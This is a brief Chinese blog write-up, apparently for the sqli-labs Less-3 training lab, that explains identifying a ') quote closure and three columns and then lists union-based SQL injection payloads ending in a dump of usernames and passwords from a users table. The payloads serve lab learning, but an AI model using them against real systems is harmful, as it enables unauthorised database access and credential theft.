首先判断是什么闭合的类型,
可以看出来是‘)的闭合类型。
然后看是多少个字段的。
可以看出是3个字段的长度。
然后判断是哪几个回显。
可以看出来是第二位和第三位,其实写到这我也不想写了,因为后面的是和之前的一样的。
贴一下码
?id=1\
?id=1') order by 3--+
?id=1') order by 4--+
?id=-1') union select 1,2,3--+
?id=-1') union select 1,database(),version()--+
?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users'--+
?id=-1') union select 1,2,group_concat(username,password) from users--+
标签:group,union,--+,schema,id,select,less3 From: https://www.cnblogs.com/xiaoxie11/p/17426088.html